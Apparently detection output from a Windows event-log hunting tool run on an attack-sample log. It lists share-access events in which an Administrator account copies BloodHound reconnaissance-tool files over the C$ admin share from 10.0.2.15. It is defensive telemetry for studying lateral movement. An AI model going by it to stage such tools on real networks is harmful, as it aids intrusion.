2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
